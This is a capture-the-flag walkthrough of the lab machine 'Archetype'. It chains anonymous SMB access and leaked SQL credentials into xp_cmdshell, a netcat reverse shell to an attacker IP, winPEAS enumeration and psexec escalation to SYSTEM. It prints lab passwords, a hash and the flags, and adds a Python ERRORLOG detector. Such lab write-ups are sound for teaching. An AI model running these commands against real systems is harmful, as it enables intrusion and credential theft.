01.ARCHETYPE (PRIVESC & MSSQL SERVER)
Protocols, MSSQL, SMB, Powershell, Reconnaissance, Remote Code Execution, Clear Text Credentials, Information Disclosure, Anonymous/Guest Access
root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn
root@htb:~$ sudo nmap -sV -T4 {targetIP} -p-
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
* Typically '-sV' is used with Nmap to determine versions, but that's not always enough.
- adding -sC is another good way to pin down service versions
- the -sC option runs the default "safe" NSE scripts, which are designed to provide useful
information without being too intrusive or causing harm to the target systems.
* use the -Pn option of Nmap when ICMP packets are blocked by the Windows firewall
- the -Pn option treats all hosts as online and skips host discovery
root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 135,139,445,1433,5985,47001,49664-49669
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-info:
| 10.129.250.20:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.250.20:1433:
| Target_Name: ARCHETYPE
| NetBIOS_Domain_Name: ARCHETYPE
| NetBIOS_Computer_Name: ARCHETYPE
| DNS_Domain_Name: Archetype
| DNS_Computer_Name: Archetype
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-03-05T03:27:06+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-03-05T03:22:42
|_Not valid after: 2055-03-05T03:22:42
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| Computer name: Archetype
| NetBIOS computer name: ARCHETYPE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-03-04T19:27:01-08:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-03-05T03:26:58
|_ start_date: N/A
|_clock-skew: mean: 1h35m59s, deviation: 3h34m41s, median: -1s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
* the -sC option runs the default set of Nmap scripts (NSE scripts), which typically include
scripts for service enumeration, version detection, and other basic checks.
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 135,139,445,1433,5985,47001,49664-49669
PORT STATE SERVICE
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
1433/tcp filtered ms-sql-s
5985/tcp filtered wsman
47001/tcp filtered winrm
49664/tcp filtered unknown
49665/tcp filtered unknown
49666/tcp filtered unknown
49667/tcp filtered unknown
49668/tcp filtered unknown
49669/tcp filtered unknown
* the --script=vuln option runs scripts that focus specifically on detecting known
vulnerabilities in the services running on the scanned ports
- e.g., weak configurations or known vulnerabilities in the exposed services
- if no results are found then the service may be fully patched!
- note that every port came back "filtered" in the run above, meaning the probes never reached the services; rerun the scan (e.g. with -Pn) before drawing any conclusion about patch level
#ENUMERATE SMB SHARES
root@htb:~$ smbclient -N -L \\\\{TARGET_IP}\\
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.250.20 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
* ADMIN$ and C$ cannot be accessed, as the Access Denied error shows; you can verify with the cmd "smbclient \\\\10.129.250.20\\ADMIN$"
* the -N flag means "no password" (anonymous / guest access)
* the -L flag lists the shares available on the target
root@htb:~$ smbclient \\\\10.129.250.20\\backups -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Jan 20 06:20:57 2020
.. D 0 Mon Jan 20 06:20:57 2020
prod.dtsConfig AR 609 Mon Jan 20 06:23:02 2020
5056511 blocks of size 4096. 2499233 blocks available
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (14.9 KiloBytes/sec) (average 14.9 KiloBytes/sec)
root@htb:~$ cat prod.dtsConfig
<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
</DTSConfiguration>
* Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc
root@oco:~$ cd impacket/examples/
root@oco:~$ python3 mssqlclient.py -h
Impacket v0.13.0.dev0+20250226.212301.ead516a1 - Copyright Fortra, LLC and its affiliated companies
root@oco:~$ python3 mssqlclient.py ARCHETYPE/sql_svc@{TARGET_IP} -windows-auth
Impacket v0.13.0.dev0+20250226.212301.ead516a1 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
* the -windows-auth flag specifies the use of Windows Authentication
SQL (ARCHETYPE\sql_svc dbo@master)> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd
#step 1: check role
SQL> SELECT is_srvrolemember('sysadmin');
-
1
* 1 refers to boolean true, 0 refers to false
#step 2: check whether xp_cmdshell command execution is enabled; if not, enable it
SQL> EXEC xp_cmdshell 'net user';
ERROR(ARCHETYPE): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
#step 3: enable xp_cmdshell command execution; the adversary can turn this on because the current login is a member of sysadmin
SQL> EXEC sp_configure 'show advanced options', 1;
INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE;
SQL> sp_configure;
name minimum maximum config_value run_value
--------------------------------- ----------- ---------- ------------ ----------
xp_cmdshell 0 1 0 0
SQL> EXEC sp_configure 'xp_cmdshell', 1;
INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE;
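Steps 1 to 3 leave a trail on the server: every sp_configure change is written to the SQL Server ERRORLOG with the same "Configuration option '...' changed from 0 to 1" text shown in the INFO lines above. As an added example (not from the original writeup), a Python detector over constructed ERRORLOG lines that flags a dangerous option being switched on and records whether the same spid toggled 'show advanced options' first; the timestamp/spid column layout is assumed from the ERRORLOG format:

```python
import re
from datetime import datetime

# Constructed SQL Server ERRORLOG excerpt. The "timestamp spid message" column layout is
# assumed from the ERRORLOG format; the message text is the one SQL Server emits for sp_configure.
SAMPLE_ERRORLOG = """\
2025-03-05 03:30:10.12 spid51      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2025-03-05 03:30:11.03 spid51      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2025-03-05 03:31:00.55 spid51      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
2025-03-05 03:32:00.00 spid9s      Server process ID is 1234.
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+(?P<spid>\S+)\s+"
    r"Configuration option '(?P<opt>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)
# Options that turn T-SQL access into OS-level or out-of-process execution once enabled.
DANGEROUS_OPTIONS = {"xp_cmdshell", "ole automation procedures", "clr enabled", "ad hoc distributed queries"}


def parse_config_changes(log_text):
    """Extract every sp_configure change event (timestamp, spid, option, old, new) from ERRORLOG text."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append({"ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"),
                           "spid": m["spid"], "option": m["opt"].lower(),
                           "old": int(m["old"]), "new": int(m["new"])})
    return events


def alerts_for(events):
    """Alert when a dangerous option is switched on (0 -> 1); record whether the same spid
    enabled 'show advanced options' beforehand, the two-step sequence used on this box."""
    advanced_spids = set()
    alerts = []
    for e in events:
        if e["option"] == "show advanced options" and e["new"] == 1:
            advanced_spids.add(e["spid"])
        elif e["option"] in DANGEROUS_OPTIONS and e["old"] == 0 and e["new"] == 1:
            alerts.append({"ts": e["ts"], "spid": e["spid"], "option": e["option"],
                           "advanced_options_first": e["spid"] in advanced_spids})
    return alerts
```

The same events are also available through the default trace and SQL Audit; pairing the alert with the login that owns the spid (sys.dm_exec_sessions) tells you which account, here sql_svc, should never have been in sysadmin.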
#step 4: proceed w/ enumeration
SQL> xp_cmdshell "whoami"
output
-----------------
archetype\sql_svc
NULL
#step 5: establish stable remote shell
SQL> xp_cmdshell "powershell -c pwd"
output
-------------------
NULL
Path
----
C:\Windows\system32
* determine where to put the reverse shell payload - the destination must be a directory writable by a regular user; system32 is writable only by administrators
- good candidates are:
- C:\Users\{userName}\Downloads
- C:\Users\{userName}\AppData\Local\Temp
root@oco:~$ BROWSER > https://github.com/int0x33/nc.exe/blob/master/nc64.exe?source=post_page-----a2ddc3557403---------------------- > Download RAW
* place the raw executable in ~/Downloads
root@oco:~$ sudo python3 -m http.server 8080
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; Invoke-WebRequest http://10.10.14.215:8080/nc64.exe -outfile nc64.exe"
* the -c flag instructs PowerShell to execute the command string that follows
* Invoke-WebRequest is aliased as wget in Windows PowerShell
* 10.10.14.215:8080 is the attacker's payload server
SQL> xp_cmdshell "powershell -c ls C:\Users\sql_svc\Downloads"
output
--------------------------------------------------------------------------------
NULL
Directory: C:\Users\sql_svc\Downloads
NULL
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/8/2025 6:58 AM 226042 nc64.exe
root@oco:~$ sudo nc -nlvp 443
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.14.215 443"
* this cmd pipes cmd.exe (on the target) through nc (the nc64.exe uploaded to the target) to the attacker's listener
* 10.10.14.215 is the attacker's IP, where a netcat listener is active on port 443
root@oco:~$ nc....
listening on [any] 443 ...
connect to [10.10.14.215] from (UNKNOWN) [10.129.163.160] 49677
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\sql_svc\Downloads> dir ..\Desktop
dir ..\Desktop
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of C:\Users\sql_svc\Desktop
01/20/2020 05:42 AM <DIR> .
01/20/2020 05:42 AM <DIR> ..
02/25/2020 06:37 AM 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 10,720,813,056 bytes free
C:\Users\sql_svc\Downloads>type ..\Desktop\user.txt
type ..\Desktop\user.txt
3e7b102e78218e935bf3f4951fec21a3
#enumerate and identify privesc vulnerabilities
root@htb:~$ BROWSER > https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fpull%2F260%2Fmerge/winPEASx64.exe
* place the raw executable in ~/Downloads
root@htb:~$ sudo python3 -m http.server 8080
C:\target> powershell -c Invoke-WebRequest http://10.10.14.215:8080/winPEASx64.exe -outfile C:\Users\sql_svc\Downloads\winPEASx64.exe
powershell -c Invoke-WebRequest http://10.10.14.215:8080/winPEASx64.exe -outfile C:\Users\sql_svc\Downloads\winPEASx64.exe
C:\Users\sql_svc\Downloads>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of C:\Users\sql_svc\Downloads
03/08/2025 08:54 AM <DIR> .
03/08/2025 08:54 AM <DIR> ..
03/08/2025 07:12 AM 45,272 nc64.exe
03/08/2025 08:54 AM 1,930,752 winPEASx64.exe
2 File(s) 1,976,024 bytes
2 Dir(s) 10,714,357,760 bytes free
C:\target> powershell -c C:\Users\sql_svc\Downloads\winPEASx64.exe
========== Enumerating Security Packages Credentials
Version: NetNTLMv2
Hash: sql_svc::ARCHETYPE:1122334455667788:cc329849205c1f61e52fdc19e00aaccc:01010000000000002b788e114b90db014f2d23496717becc000000000800300030000000000000000000000000300000f11c34cbf3b69a899ead4a6e45502bc55e34a586839efe4a44845307169f1c090a00100000000000000000000000000000000000090000000000000000000000
...
========== PowerShell Settings
PowerShell v2 Version: 2.0
PowerShell v5 Version: 5.1.17763.1
PowerShell Core Version:
Transcription Settings:
Module Logging Settings:
Scriptblock Logging Settings:
PS history file: C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS history size: 79B
...
========== Current Token privileges
- Check if you can escalate privilege using some enabled token https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#token-manipulation
SeAssignPrimaryTokenPrivilege: DISABLED
SeIncreaseQuotaPrivilege: DISABLED
SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeImpersonatePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeCreateGlobalPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeIncreaseWorkingSetPrivilege: DISABLED
...
========== Analyzing Windows Files Files (limit 70)
C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
C:\Users\Default\NTUSER.DAT
C:\Users\sql_svc\NTUSER.DAT
...
* SeImpersonatePrivilege is enabled and is a candidate for privilege escalation; the PowerShell history file listed above is checked first
C:\target> dir C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\
dir
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
01/20/2020 05:04 AM <DIR> .
01/20/2020 05:04 AM <DIR> ..
03/17/2020 01:36 AM 79 ConsoleHost_history.txt
1 File(s) 79 bytes
2 Dir(s) 10,713,939,968 bytes free
C:\target> type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit
#escalate privileges
root@htb:~$ python3 psexec.py administrator@{TARGET_IP}
Impacket v0.13.0.dev0+20250307.160229.6e0a9691 - Copyright Fortra, LLC and its affiliated companies
Password: MEGACORP_4dm1n!!
[*] Requesting shares on 10.129.241.250.....
[*] Found writable share ADMIN$
[*] Uploading file yQzLFkqG.exe
[*] Opening SVCManager on 10.129.241.250.....
[*] Creating service pQUO on 10.129.241.250.....
[*] Starting service pQUO.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.
* the password can't be given along with the cmd; it must be supplied at the prompt afterward
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> cd c:\users
C:\Users> dir
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of c:\Users
01/19/2020 03:10 PM <DIR> .
01/19/2020 03:10 PM <DIR> ..
01/19/2020 10:39 PM <DIR> Administrator
01/19/2020 10:39 PM <DIR> Public
01/20/2020 05:01 AM <DIR> sql_svc
0 File(s) 0 bytes
5 Dir(s) 10,695,737,344 bytes free
C:\Windows\Users> cd c:\users\Administrator
C:\Users\Administrator> cd Desktop
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of c:\Users\Administrator\Desktop
07/27/2021 01:30 AM <DIR> .
07/27/2021 01:30 AM <DIR> ..
02/25/2020 06:36 AM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 10,695,774,208 bytes free
C:\Users\Administrator\Desktop> type root.txt
b91ccec3305e98240082d4474b848528